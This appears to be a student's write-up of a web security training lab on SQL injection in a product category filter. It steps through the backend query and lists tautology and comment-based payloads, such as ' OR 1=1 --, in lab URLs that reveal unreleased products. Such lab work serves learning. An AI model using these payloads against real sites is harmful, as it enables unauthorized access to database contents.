SQL injection - product category filter

SELECT * FROM products WHERE category = 'Gifts' AND released = 1 

End goal: display all products both released and unreleased.

Analysis:

SELECT * FROM products WHERE category = 'Pets' AND released = 1

SELECT * FROM products WHERE category = ''' AND released = 1 

SELECT * FROM products WHERE category = ''--' AND released = 1 

SELECT * FROM products WHERE category = ''

SELECT * FROM products WHERE category = '' or 1=1 --' AND released = 1 

Answers:

1. https://0acf00fb0392aeb18216a15a00730057.web-security-academy.net/filter?category=' OR '1'='1'

2. https://0acf00fb0392aeb18216a15a00730057.web-security-academy.net/filter?category=' or 1=1 --

3. https://0acf00fb0392aeb18216a15a00730057.web-security-academy.net/filter?category='+OR+1=1--
